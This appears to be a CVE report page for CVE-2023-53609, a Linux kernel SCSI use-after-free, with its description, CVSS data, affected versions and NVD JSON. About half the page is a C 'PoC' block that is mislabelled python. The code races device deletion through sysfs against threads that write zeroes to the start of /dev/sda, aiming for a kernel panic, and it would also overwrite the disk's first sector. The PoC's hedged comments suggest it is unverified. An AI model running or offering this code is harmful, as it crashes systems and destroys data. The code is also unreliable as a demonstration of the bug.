Security Vulnerability Report
中文
CVE-2023-53609 CVSS 5.5 MEDIUM

CVE-2023-53609

Published: 2025-10-04 16:15:58
Last Modified: 2026-03-17 16:44:24
Source: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

Description

In the Linux kernel, the following vulnerability has been resolved: scsi: Revert "scsi: core: Do not increase scsi_device's iorequest_cnt if dispatch failed" The "atomic_inc(&cmd->device->iorequest_cnt)" in scsi_queue_rq() would cause kernel panic because cmd->device may be freed after returning from scsi_dispatch_cmd(). This reverts commit cfee29ffb45b1c9798011b19d454637d1b0fe87d.

CVSS Details

CVSS Score
5.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.4:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:6.4:rc2:*:*:*:*:*:* - VULNERABLE
Linux Kernel 引入commit cfee29ffb45b1c9798011b19d454637d1b0fe87d后的版本
Linux Kernel mainline(受影响分支)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// CVE-2023-53609 PoC - Linux Kernel SCSI Use-After-Free Trigger // This PoC demonstrates triggering the kernel panic by racing // SCSI device removal with I/O dispatch failure. #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <fcntl.h> #include <pthread.h> #include <sys/ioctl.h> #include <errno.h> #include <signal.h> #include <sys/types.h> #include <sys/stat.h> #define SCSI_DEVICE_PATH "/dev/sda" #define NUM_THREADS 16 #define ITERATIONS 10000 // Thread 1: Continuously issue I/O to the SCSI device void *io_worker(void *arg) { char path[64]; snprintf(path, sizeof(path), "%s", (char *)arg); for (int i = 0; i < ITERATIONS; i++) { int fd = open(path, O_RDWR | O_DIRECT); if (fd < 0) continue; char buf[4096]; memset(buf, 0, sizeof(buf)); // Issue read/write to trigger scsi_queue_rq -> scsi_dispatch_cmd path ssize_t ret = write(fd, buf, sizeof(buf)); if (ret < 0) { // Failed dispatch may trigger the vulnerable code path // where cmd->device could be freed } close(fd); usleep(1); } return NULL; } // Thread 2: Trigger device removal/reset to race with I/O dispatch void *removal_worker(void *arg) { for (int i = 0; i < ITERATIONS; i++) { // Trigger SCSI device rescan/removal via sysfs // This can cause scsi_device to be freed while // scsi_dispatch_cmd() is still processing int fd = open("/sys/block/sda/device/delete", O_WRONLY); if (fd >= 0) { write(fd, "1", 1); close(fd); } usleep(100); // Rescan to bring device back fd = open("/sys/bus/scsi/drivers/sd/0:0:0:0/rescan", O_WRONLY); if (fd >= 0) { write(fd, "1", 1); close(fd); } usleep(100); } return NULL; } int main(int argc, char *argv[]) { const char *dev = (argc > 1) ? argv[1] : SCSI_DEVICE_PATH; printf("[*] CVE-2023-53609 PoC - SCSI Use-After-Free\n"); printf("[*] Target device: %s\n", dev); printf("[*] Racing I/O dispatch with device removal...\n"); pthread_t threads[NUM_THREADS]; // Create I/O worker threads for (int i = 0; i < NUM_THREADS - 1; i++) { pthread_create(&threads[i], NULL, io_worker, (void *)dev); } // Create removal worker thread pthread_create(&threads[NUM_THREADS - 1], NULL, removal_worker, NULL); // Wait for all threads for (int i = 0; i < NUM_THREADS; i++) { pthread_join(threads[i], NULL); } printf("[*] Done. Check dmesg for kernel panic.\n"); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2023-53609", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-04T16:15:57.647", "lastModified": "2026-03-17T16:44:23.773", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: Revert \"scsi: core: Do not increase scsi_device's iorequest_cnt if dispatch failed\"\n\nThe \"atomic_inc(&cmd->device->iorequest_cnt)\" in scsi_queue_rq() would\ncause kernel panic because cmd->device may be freed after returning from\nscsi_dispatch_cmd().\n\nThis reverts commit cfee29ffb45b1c9798011b19d454637d1b0fe87d."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.3.4", "matchCriteriaId": "26C54BF0-3EED-46D4-92A7-5F07F658B49B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.4:rc1:*:*:*:*:*:*", "matchCriteriaId": "38BC6744-7D25-4C02-9966-B224CD071D30"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.4:rc2:*:*:*:*:*:*", "matchCriteriaId": "76061B41-CAE9-4467-BEDE-0FFC7956F2A1"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/35fe6fa57b994e7da222893adf0bb748d6055e73", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/6ca9818d1624e136a76ae8faedb6b6c95ca66903", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.